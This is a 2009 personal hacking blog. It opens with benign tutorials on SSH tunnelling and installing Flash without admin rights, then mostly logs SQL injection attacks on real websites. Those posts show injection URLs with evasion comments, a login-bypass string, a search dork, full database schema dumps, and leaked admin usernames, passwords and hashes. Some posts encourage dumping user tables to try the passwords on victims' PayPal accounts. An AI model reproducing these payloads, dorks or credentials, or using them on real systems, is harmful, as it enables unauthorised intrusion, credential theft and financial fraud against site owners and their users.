viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Friday, October 30, 2009

-- Blog CLOSED --

11:46 PM Posted by viperfx07 No comments
I think I get no time to update hacking activities because of my study. If you want to get any updates of manga, just go to or

See you next time...

Tuesday, August 11, 2009

[Tutorial] Remote Desktop and SSH behind HTTP NTLM Authentication Proxy Server

3:25 PM Posted by viperfx07 No comments
This is a great lesson and i can't do it in my hometown because my ISP there blocks all inbound ports. Here, in Australia, i can learn and do it in one university.

There are some configurations needed to do this. I have my laptop behind router to connect to the internet.

Laptop :
Public IP:

You need to download:
1. Putty. A great free telnet/SSH tool.
2. CopSSH. free SSH server

1st, you can get the tutorial here to get the idea of tunneling. :

my router setting:
Port forward : 22 to your ip If the proxy doesn' t allow SSH, use 80/443 because most of them allow these ports.
Port forward: 55555 to your ip If you use default RDC port, fill it with 3389.

my CopSSH setting:
i change my default listening port from 22 to 80. You can change it by modifying sshd_config file

my Putty setting (the most essential ones):
1. Connection - SSH. Tick Enable compression. Choose 2 or 2 only.
2. Proxy. The university use HTTP Proxy so choose HTTP. enter Proxy hostname with its port. Then enter username and password. Enter username with this format: Domain\Username
3. Connection - SSH - Tunnels.
Add new forwarded port:
Source port: 3389 (you can choose any port)
Destination: (I change default port of RDC 3389 to 55555 for security reason. To do this, you can see the tutorial here)
Then press Add

1. Run your putty. After that you will be asked to enter the username and password of user who is assigned to copSSH.
2. Run Remote Desktop Connection. Fill Connect box with localhost:3389
3. Voila.

Happy tunneling.

Tuesday, August 4, 2009

[Tutorial] Disable Splash Screen on Firefox Portable

5:31 PM Posted by viperfx07 No comments
1. Copy the \FireFoxPortable\Other\Source\FirefoxPortable.ini to the \FirefoxPortable (or where FirefoxPortable.exe exist) or you can create a file and name it FirefoxPortable.ini

2. Make sure the content of the file is like below (especially the DisableSplashScreen):

[Tutorial] Installing Flash Player Plugin on Firefox without Administrator Privilege or Installation File

5:27 PM Posted by viperfx07 No comments
UPDATE: The following guide, originally wrote for Firefox 2, has been used successfully on Firefox 3 and Firefox 3.5. Users of Firefox Portable edition (versions 3 and 3.5) also have been successful using this guide.

The Windows computers available at my University permits login only by autenticated users (students) who don't have Administrator access and permissions.

Installing software on those PC is then not possible.

Recently they finally installed Firefox 2 but without the Flash plugins, which is absolutly useful/needed.

I then tryed to install the Flash Player using the "standard" way (click on the missing plugin link then install the plugin..). However without administrator plugins it was not possible to install.

Then I started doing some tests trying to install the plugin manually. Now I have it installed and working perfectly!

This is how I managed to install it without administrator permissions:

1. Download the XPI archive of the Flash Player Plugin to your hard disk (right click on the download link then "Save link as.."). XPI archives are only ZIP files containing the files used by the plugins.
2. So you can safely rename the file you just downloaded, called flashplayer-win.xpi, into (you are changing its extension from .xpi to .zip)
3. Extract the files in the archive. You can use any program capable of opening .zip files (WinZip, WinRAR or the free and great 7-zip). There are also websites which can uncompress archives:
4. Copy the files flashplayer.xpt and NPSWF32.dll to %APPDATA%\Mozilla\Plugins\
* %APPDATA% is the folder which holds your applications profiles and settings.
* You can open this folder simply choosing "Start → Run → Type in %APPDATA% → OK".
* In case you don't have a Plugins folder you can create one and place your files there.
5. Restart Firefox
6. Enjoy your flash websites!


Wednesday, July 15, 2009

Saturday, July 11, 2009

[Hacking] darkMySQLi v1.6

3:12 PM Posted by viperfx07 , No comments
New Version of schemafuzz.
More information: click Read More or here

# .___ __ _______ .___ #
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
# \/ \/ \/ #
# ___________ ______ _ __ #
# _/ ___\_ __ \_/ __ \ \/ \/ / #
# \ \___| | \/\ ___/\ / #
# \___ >__| \___ >\/\_/ #
# est.2007 \/ \/ #
# Multi-Purpose MySQL Injection Tool
# *union injection
# *blind injection
# *post and get method injection ** POST not working yet
# *full information_schema enumeration
# *table and column fuzzer
# *database information extractor
# *column length finder
# *load_file fuzzer
# *general info gathering
# *MySQL hash cracker
# *Round Robin Proxy w/ a proxy list (non-auth or auth proxies)
# *Proxy Auth (works great with Squid w/ basic auth)
# *Random browser agent chosen everytime the script runs
# *debug mode for seeing every URL request, proxy used, browser agent used

# Share the c0de! (f*ck Windows! Get a real OS!)

# darkc0de Crew
# rsauron[at]gmail[dot]com

# Greetz to
# d3hydr8, Tarsian, c0mrade (r.i.p brotha), reverenddigitalx, rechemen
# and the darkc0de crew

# This was written for educational purpose only. Use it at your own risk.
# Author will be not responsible for any damage!
# Intended for authorized Web Application Pen Testing!

# 1.6 ADDED --end evasion setting
# 1.5 Fixed --strart now starts at correct number instead of +1
# 1.4 Fixed schema mode when a table was specified - app would hand after last column
# 1.3 Fixed Regular Expression Search in dump mode (should fixs issues of crazy html code when dumping)
# 1.2 Fixed mode findcol - the way it replaced darkc0de in the output URL string

Sunday, March 22, 2009


11:14 PM Posted by viperfx07 No comments
I can't enjoy hacking as much as i could. It's really annoying. Below is my first hack in this month and it's unintended.

Tool: v5.0 mod by me & IntelliTamper
Admin panel:
Admin usr/pwd: admin:admin or andy:admin

[+] URL:,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 22:38:07
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: soprano_qbround2
User: soprano_qbround2@localhost
Version: 5.0.32-Debian_7etch8
[+] Showing Tables & Columns from database "soprano_qbround2"
[+] Number of Tables: 10

[Database]: soprano_qbround2
[Table: Columns]
[0]comment: id_comment,comment,id_contestant,id_submission,name,email,publish,posted_on
[1]comment_contestant: id_comment_contestant,comment,id_contestant,id_contestant_comment,name,email,publish,posted_on
[2]contestant: id_contestant,name,user_name,password,real_password,image,thumbnail,last_login,score,hit_counter,comment_counter,address,personal_quote,email,bday,city,post_code,mobile_number,home_number,school,know,know_description,joined_on
[3]member: id_member,name,email,address,bday,city,post_code,mobile_number,home_number,school,know,know_description,personal_quote,score,photo,joined_on
[4]mission: id_mission,title,content,publish,posted_on
[5]news: id_news,title,content,image,thumbnail,publish,posted_on
[6]role: id_role,role_description
[7]submission: id_submission,title,content,image,thumbnail,video_link,id_contestant,id_mission,hit_counter,publish,posted_on
[8]tell_friend: id_tell_friend,id_contestant,name,email,friend,friend_email,sent_on
[9]user: id_user,username,name,password,email,user_role,last_login,join_date

[-] [22:53:59]
[-] Total URL Requests 117
[-] Done

[+] URL:,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 22:55:42
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: soprano_qbround2
User: soprano_qbround2@localhost
Version: 5.0.32-Debian_7etch8
[+] Dumping data from database "soprano_qbround2" Table "user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 2


[-] [22:56:13]
[-] Total URL Requests 4
[-] Done

Friday, February 13, 2009

Saturday, February 7, 2009


12:02 PM Posted by viperfx07 No comments

Tools : v.50 mod by me
Admin panel: /login.php
Admin user/pwd: mommy:mommy
P.S: this vuln already been found, and it's on google

[+] URL:,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:53:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Showing Tables & Columns from database "axiscoid_db"
[+] Number of Tables: 18

[Database]: axiscoid_db
[Table: Columns]
[0]tb_case: id,product,name,date,description,addtext
[1]tb_complain: id,userid,date,subject,complain
[2]tb_contact: Id,owner,name,email,mobile,ket
[3]tb_file: Id,name,type,folder,shared,created,update,owner,size
[4]tb_link: id,name,address,ket
[5]tb_mcontent: id,category,name,date,description,addtext
[6]tb_news: code,catagory,header,writer,date,news,pic,status,inc
[7]tb_news_status: code,name
[8]tb_news_topic: code,name
[9]tb_partner: id,name,email,address,phone,website,company
[10]tb_product: id,name,date,descreption,pic_front,logo,status,addtext
[11]tb_product_cat: code,name
[12]tb_product_status: code,name
[13]tb_promotion: id,word,date,picture,status,category,link
[14]tb_promotion_cat: id,name
[15]tb_search: id,keyword,address,desc,date
[16]tb_user: id,userid,password,nama,email,alamat,phone,mobile,tmp_lahir,tgl_lahir,status
[17]tb_user_cat: code,name

[-] [11:54:56]
[-] Total URL Requests 97
[-] Done

[+] URL:,1,sqli,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 11:56:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: axiscoid_db
User: axiscoid_db@localhost
Version: 5.0.37-standard
[+] Dumping data from database "axiscoid_db" Table "tb_user"
[+] Column(s) ['userid', 'password', 'email']
[+] Number of Rows: 1


[-] [11:56:16]
[-] Total URL Requests 3
[-] Done

Thursday, February 5, 2009


3:57 PM Posted by viperfx07 No comments

Tools: v5.0 mod by me.
Admin loc: /admin
Admin user/pwd: enter this "' or 'a'='a" (without double quotes) to both fields.
Ps: It's already been owned by some Turkey hackers. ^^

[+] URL:'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:58:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t

[+] Do we have Access to Load_File: Yes <-- w00t w00t

[-] [15:58:19]
[-] Total URL Requests 3
[-] Done

[+] URL:'/**/AND/**/1=2/**/UNION/**/SELECT/**/0,1,2,sqli,4,5,6,7,8/*
[+] Evasion Used: "/**/" "/*"
[+] 15:48:17
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: bpendb
User: bpendb@localhost
Version: 5.0.27-log
[+] Showing Tables & Columns from database "bpendb"
[+] Number of Tables: 110

Stop here because too many tables.

Tuesday, February 3, 2009


5:51 PM Posted by viperfx07 No comments

Dork : "Powered by endonesia 8.4"
Tools: v5.0 mod by me
Admin panel: /admin
Admin usr/pwd : Endonesia:jatwar22

[+] URL:,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 17:46:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: endorg_endorg
User: endorg_endorg@localhost
Version: 5.0.67-community
[+] Dumping data from database "endorg_endorg" Table "authors"
[+] Column(s) ['aid', 'pwd']
[+] Number of Rows: 1

[0] Endonesia:ca1db2899cf4bb64cd1b67ea68140bcc


5:32 PM Posted by viperfx07 No comments

Tools: schemafuzz v5.0 mod by me
Dork : "Powered by eNdonesia 8.4"
This exploit can also be found on, but there is a slight different.
Admin panel :
Admin usr/pwd : admin : is12123

[+] URL:,1--
[+] Evasion Used: "+" "--"
[+] 17:36:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 6


[+] URL:,1--
[+] Evasion Used: "+" "--"
[+] 17:13:35
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Showing Tables & Columns from database "isnet_dbend83"
[+] Number of Tables: 36

[Database]: isnet_dbend83
[Table: Columns]
[0]authors: aid,name,url,email,pwd,counter
[1]banner: bid,cid,imptotal,impmade,clicks,imageurl,clickurl,date
[2]bannerclient: cid,name,contact,email,login,passwd,extrainfo
[3]bannerfinish: bid,cid,impressions,clicks,datestart,dateend
[4]counter: type,var,count
[5]lblocks: id,title,content,order_id
[6]main_page_content: main_title,main_text,main_image,main_image_active,alt,active
[7]mod_about: aboutid,parentid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,postdate,lastupdate
[8]mod_content: contid,parentid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,postdate,lastupdate
[9]mod_diskusi: did,cid,title,disktext,author,postdate,counter
[10]mod_diskusi_categories: cid,title,parentid
[11]mod_diskusi_response: rid,did,title,disktext,responder,postdate,counter
[12]mod_iklanbaris: lid,cid,title,description,url,postdate,expiredate,uname
[13]mod_iklanbaris_categories: cid,title,parentid
[14]mod_informasi: infoid,parentid,intypeid,jenis,menu,url,judul,info,foto,fotopos,status,orderid,feat,postdate,lastupdate
[15]mod_informasi_type: intypeid,infotype,status,orderid,postdate
[16]mod_katalog: lid,title,url,description,date,name,email,hits
[17]mod_katalog_categories: cid,title,parentid
[18]mod_katalog_katakate: kake,lid,cid
[19]mod_katalog_related: kare,cid,related
[20]mod_katalog_validate: lid,cid,title,url,description,name,email,date
[21]mod_newsletter: tipnl_id,tipnl_title,tipnl_description,tipnl_htmlemail,tipnl_plainemail,tipnl_status
[22]mod_newsletter_members: tipnm_id,tipnm_name,tipnm_email,tipnm_newsid,tipnm_mailpref
[23]mod_poll_comments: cid,rid,pid,date,name,email,url,host_name,subject,comment,score,reason
[24]mod_poll_data: pid,data
[25]mod_poll_flag: pid,flag
[26]mod_publisher: artid,aid,title,time,released,hometext,bodytext,counter,informant,media,extension
[27]mod_publisher_categories: cid,title,parentid,orderid
[28]mod_publisher_frontpage: fpid,position,category,flimit,orderid,media
[29]mod_publisher_media: mid,artid,extension,thumbnail_extension,title,description,short_description,width,height,filesize,time
[30]mod_publisher_submit: subid,cid,title,time,hometext,bodytext,informant
[31]mod_publisher_topik: ptid,artid,cid
[32]modules: id,name,source_file,img,plug_dir,block_pos,block_order,block_file,admin_only,user_only,admin_inc,about
[33]new_referer: ref_id,url,hit_total,time
[34]rblocks: id,title,content,order_id
[35]users: uid,name,uname,email,femail,url,pass,storynum,bio,ublockon,ublock,theme,counter,regdate,lastlogin

[-] [17:21:01]
[-] Total URL Requests 245
[-] Done

[+] URL:,1--
[+] Evasion Used: "+" "--"
[+] 17:25:46
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: isnet_dbend83
User: isnet_siti@localhost
Version: 5.0.67-community
[+] Dumping data from database "isnet_dbend83" Table "authors"
[+] Column(s) ['name', 'pwd']
[+] Number of Rows: 1

[0] admin:df9dc8d9eac3e24570e9d39ac2a90988: = is12123

[-] [17:25:52]
[-] Total URL Requests 3
[-] Done


2:06 PM Posted by viperfx07 1 comment
Tools : v5.0 mod by me
Adv : some email password is their paypal password. So dump it and check it by yourself. First 102 rows are already dumped by me.

[+] URL:,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[+] Evasion Used: "+" "--"
[+] 13:32:19
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: enutriti_enut08
User: enutriti_usr08@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "enutriti_enut08"
[+] Number of Tables: 18

[Database]: enutriti_enut08
[Table: Columns]
[0]ahfa_disallow: id,username
[1]ahfa_f_category: cate_id,cate_title,cate_order,cate_lock
[2]ahfa_f_forum: forum_id,cate_id,forum_title,forum_desc,forum_order,forum_lock,last_post
[3]ahfa_f_post: post_id,topic_id,forum_id,userid,username,post_ip,post_added,post_edited,post_subject,post_text,topic
[4]ahfa_f_topic: topic_id,forum_id,topic_title,topic_poster,topic_views,topic_replies,last_post,topic_lock,topic_moved_id
[5]ahfa_f_topic_watch: topic_id,userid
[6]ahfa_newsletter: id,name,email,active,added
[7]ahfa_s_brand: brand_id,brand
[8]ahfa_s_category: cate_id,cate_title,cate_order,html_title,keywords,description,cate_lock
[9]ahfa_s_code: code_id,code_name,code,type,discount,expiry,active
[10]ahfa_s_order: order_id,userid,personal,added,total,billing,delivery,items,trans_id,code,discount_type
[11]ahfa_s_postage: postage_id,postage
[12]ahfa_s_product: product_id,subcate_id,cate_id,brand_id,product_title,recommended,caption,product_desc,html_title,keywords,description,product_price,gst,rrp,product_qty,alert_qty,product_lock,discount,image,added,sold,link,postage1,postage2,supplier_id,discount_type
[13]ahfa_s_subcate: subcate_id,cate_id,subcate_title,subcate_desc,subcate_order,html_title,keywords,description,subcate_lock
[14]ahfa_s_supplier: supplier_id,supplier,supplier_email
[15]ahfa_s_temp: order_id,uid,np_details,nb_details,nd_details,my_cart,code,discount_type,total_price,discounted_products
[16]ahfa_user: userid,username,password,firstname,lastname,signature,email,contact,age,gender,height,weight,marketing,addr1,addr2,city,state,postcode,country,p_addr1,p_addr2,p_city,p_state,p_postcode,p_country,type,active,banned,added,edited,visited,posts,orders,viewed,ordered,activation_code
[17]ahfa_words: word_id,word,replacement

[-] [13:33:48]
[-] Total URL Requests 158
[-] Done

[+] URL:,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--
[+] Evasion Used: "+" "--"
[+] 13:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: enutriti_enut08
User: enutriti_usr08@localhost
Version: 5.0.51a-community
[+] Dumping data from database "enutriti_enut08" Table "ahfa_user"
[+] Column(s) ['username', 'password', 'email']
[+] Number of Rows: 421



2:02 PM Posted by viperfx07 No comments
Tools: v5.0 mod by me
Advantage: Use it wisely. Dump it and check if their paypal password is their email password ^^

[+] URL:,1,sqli,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
[+] Evasion Used: "+" "--"
[+] 13:29:28
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: db60028b
User: us60028a@localhost
Version: 5.0.19-standard
[+] Showing Tables & Columns from database "db60028b"
[+] Number of Tables: 72

[Database]: db60028b
[Table: Columns]
[0]ahfa_disallow: id,username
[1]ahfa_f_category: cate_id,cate_title,cate_order
[2]ahfa_f_forum: forum_id,cate_id,forum_title,forum_desc,forum_order,forum_lock,last_post
[3]ahfa_f_post: post_id,topic_id,forum_id,userid,username,post_ip,post_added,post_edited,post_subject,post_text,topic
[4]ahfa_f_topic: topic_id,forum_id,topic_title,topic_poster,topic_views,topic_replies,last_post,topic_lock,topic_moved_id
[5]ahfa_f_topic_watch: topic_id,userid
[6]ahfa_forumauth_access: group_id,forum_id,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments,auth_mod
[7]ahfa_forumbanlist: ban_id,ban_userid,ban_ip,ban_email
[8]ahfa_forumcategories: cat_id,cat_title,cat_order
[9]ahfa_forumconfig: config_name,config_value
[10]ahfa_forumconfirm: confirm_id,session_id,code
[11]ahfa_forumdisallow: disallow_id,disallow_username
[12]ahfa_forumforum_prune: prune_id,forum_id,prune_days,prune_freq
[13]ahfa_forumforums: forum_id,cat_id,forum_name,forum_desc,forum_status,forum_order,forum_posts,forum_topics,forum_last_post_id,prune_next,prune_enable,auth_view,auth_read,auth_post,auth_reply,auth_edit,auth_delete,auth_sticky,auth_announce,auth_vote,auth_pollcreate,auth_attachments
[14]ahfa_forumgroups: group_id,group_type,group_name,group_description,group_moderator,group_single_user
[15]ahfa_forumposts: post_id,topic_id,forum_id,poster_id,post_time,poster_ip,post_username,enable_bbcode,enable_html,enable_smilies,enable_sig,post_edit_time,post_edit_count
[16]ahfa_forumposts_text: post_id,bbcode_uid,post_subject,post_text
[17]ahfa_forumprivmsgs: privmsgs_id,privmsgs_type,privmsgs_subject,privmsgs_from_userid,privmsgs_to_userid,privmsgs_date,privmsgs_ip,privmsgs_enable_bbcode,privmsgs_enable_html,privmsgs_enable_smilies,privmsgs_attach_sig
[18]ahfa_forumprivmsgs_text: privmsgs_text_id,privmsgs_bbcode_uid,privmsgs_text
[19]ahfa_forumranks: rank_id,rank_title,rank_min,rank_special,rank_image
[20]ahfa_forumsearch_results: search_id,session_id,search_time,search_array
[21]ahfa_forumsearch_wordlist: word_text,word_id,word_common
[22]ahfa_forumsearch_wordmatch: post_id,word_id,title_match
[23]ahfa_forumsessions: session_id,session_user_id,session_start,session_time,session_ip,session_page,session_logged_in,session_admin
[24]ahfa_forumsessions_keys: key_id,user_id,last_ip,last_login
[25]ahfa_forumsmilies: smilies_id,code,smile_url,emoticon
[26]ahfa_forumthemes: themes_id,template_name,style_name,head_stylesheet,body_background,body_bgcolor,body_text,body_link,body_vlink,body_alink,body_hlink,tr_color1,tr_color2,tr_color3,tr_class1,tr_class2,tr_class3,th_color1,th_color2,th_color3,th_class1,th_class2,th_class3,td_color1,td_color2,td_color3,td_class1,td_class2,td_class3,fontface1,fontface2,fontface3,fontsize1,fontsize2,fontsize3,fontcolor1,fontcolor2,fontcolor3,span_class1,span_class2,span_class3,img_size_poll,img_size_privmsg
[27]ahfa_forumthemes_name: themes_id,tr_color1_name,tr_color2_name,tr_color3_name,tr_class1_name,tr_class2_name,tr_class3_name,th_color1_name,th_color2_name,th_color3_name,th_class1_name,th_class2_name,th_class3_name,td_color1_name,td_color2_name,td_color3_name,td_class1_name,td_class2_name,td_class3_name,fontface1_name,fontface2_name,fontface3_name,fontsize1_name,fontsize2_name,fontsize3_name,fontcolor1_name,fontcolor2_name,fontcolor3_name,span_class1_name,span_class2_name,span_class3_name
[28]ahfa_forumtopics: topic_id,forum_id,topic_title,topic_poster,topic_time,topic_views,topic_replies,topic_status,topic_vote,topic_type,topic_first_post_id,topic_last_post_id,topic_moved_id
[29]ahfa_forumtopics_watch: topic_id,user_id,notify_status
[30]ahfa_forumuser_group: group_id,user_id,user_pending
[31]ahfa_forumusers: user_id,user_active,username,user_password,user_session_time,user_session_page,user_lastvisit,user_regdate,user_level,user_posts,user_timezone,user_style,user_lang,user_dateformat,user_new_privmsg,user_unread_privmsg,user_last_privmsg,user_login_tries,user_last_login_try,user_emailtime,user_viewemail,user_attachsig,user_allowhtml,user_allowbbcode,user_allowsmile,user_allowavatar,user_allow_pm,user_allow_viewonline,user_notify,user_notify_pm,user_popup_pm,user_rank,user_avatar,user_avatar_type,user_email,user_icq,user_website,user_from,user_sig,user_sig_bbcode_uid,user_aim,user_yim,user_msnm,user_occ,user_interests,user_actkey,user_newpasswd
[32]ahfa_forumvote_desc: vote_id,topic_id,vote_text,vote_start,vote_length
[33]ahfa_forumvote_results: vote_id,vote_option_id,vote_option_text,vote_result
[34]ahfa_forumvote_voters: vote_id,vote_user_id,vote_user_ip
[35]ahfa_forumwords: word_id,word,replacement
[36]ahfa_s_brand: brand_id,brand
[37]ahfa_s_category: cate_id,cate_title,cate_order,html_title,keywords,description,cate_lock
[38]ahfa_s_order: order_id,userid,personal,added,total,billing,delivery,items,trans_id,processed
[39]ahfa_s_postage: postage_id,postage
[40]ahfa_s_product: product_id,subcate_id,cate_id,brand_id,product_title,caption,product_desc,html_title,keywords,description,product_price,gst,rrp,product_qty,product_lock,discount,image,added,sold,link,postage1,postage2,supplier_id
[41]ahfa_s_subcate: subcate_id,cate_id,subcate_title,subcate_desc,subcate_order,html_title,keywords,description,subcate_lock
[42]ahfa_s_supplier: supplier_id,supplier,supplier_email
[43]ahfa_s_temp: order_id,uid,np_details,nb_details,nd_details,my_cart
[44]ahfa_user: userid,username,password,firstname,lastname,signature,email,contact,age,gender,height,weight,marketing,addr1,addr2,city,state,postcode,country,p_addr1,p_addr2,p_city,p_state,p_postcode,p_country,type,active,banned,added,edited,visited,posts,orders,viewed,ordered,activation_code
[45]ahfa_words: word_id,word,replacement
[46]hfc: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,DateChanged,DateChangedU,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions,DirectoryType,CategoryBusiness,ServiceCategory,CityBusiness
[47]hfc_exp: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[48]hfc_freelist: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable
[49]hfc_freelist_business: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions,DirectoryType,CategoryBusiness,ServiceCategory,CityBusiness
[50]hfc_freelist_test: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable
[51]hfc_leads: id,userid,action,dateadded,dateviewed,firstname,lastname,email,phone,addr1,addr2,state,postcode,comment,alert
[52]hfc_standard: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink
[53]hfc_standard_offer: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[54]hfc_standard_offer_golive: userid,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink,TermsConditions
[55]hfc_temp: id,Category,FirstName,LastName,Dear,Title,Company,Addr1,Addr2,City,Area,Suburb,State,Zip,Country,Assistant,Phone1,PhDesc1,Phone2,PhDesc2,Mobile,MobileDec1,Fax1,Fax2,Email1,Email2,Email3,Description,Website,Blurb,DateAdded,TimeAdded,ip,browser,Paid,SidePicture,Logo,username,password,Timetable,Headline,CalltoAction,SODescription,SpecialOffersLink
[56]lms: id,firstname,lastname,email,phone,centre,password,dateadded
[57]mgcc_events: event_id,type,date,event,desc,link
[58]mgcc_results: result_id,type,month,year,event,desc,link
[59]newsletter: userid,FirstName,LastName,Email1,Addr1,Addr2,State,Zip,Phone1,Mobile,Date
[60]old_stats: userid,timestamp,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[61]stats: userid,timestamp,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[62]stats06b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[63]stats07b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[64]stats_b: id,userid,browser,ip,recieved,month,timestamp,Category,City,Suburb,impressions,email,emailclicks,webclicks,eo_impressions,eo_takeupoffer
[65]stats_type: id,type
[66]tt_class: id,class_id,venue_id,client_id,type_id,instructor_id,duration,day,time,description,note
[67]tt_class_old: class_id,venue_id,type_id,instructor_id,duration,mon,tue,wed,thu,fri,sat,sun,logo,description,desc_mon,desc_tue,desc_wed,desc_thu,desc_fri,desc_sat,desc_sun
[68]tt_client: client_id,client,logo,bg_c,bg_i,bg_r,tb_b_w,tb_b_c,tb_hd_bg_c,tb_hd_bg_i,tb_hd_bg_r,tb_hd_f_c,tb_cls_bg_c,tb_cls_f_c,tb_wd_bg_c,tb_wd_f_c,tb_t_bg_c,tb_t_f_c,tb_empty_c,tb_cl_bg_c,tb_cl_f_c,tb_uc_f_c,username,password,date_added,date_changed
[69]tt_instructor: instructor_id,firstname,surname,client_id,description
[70]tt_type: type_id,type,client_id,description,intensity,logo
[71]tt_venue: venue_id,client_id,venue,interval,date_added,date_changed,addr1,addr2,city,state,int_state,postcode,country,email,phone,fax,url,logo

[-] [13:43:36]
[-] Total URL Requests 1016
[-] Done

Saturday, January 17, 2009


12:46 AM Posted by viperfx07 No comments

Another site using QB Headlines. hacked using sql injection

Tool = v5.0
Admin page =
Admin usr:pwd = admin:qbpwd

[+] URL:,1,2,3,4,5,6,7,8,9--
[+] Evasion Used: "+" "--"
[+] 23:46:30
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: korans3_koranslawi
User: korans3_dj4far@localhost
Version: 4.1.22-standard
[+] Dumping data from database "korans3_koranslawi" Table "user"
[+] and Column(s) ['uname', 'pwd']
[+] Number of Rows: 3

[0] admin:qbpwd:
[1] invest:invest:
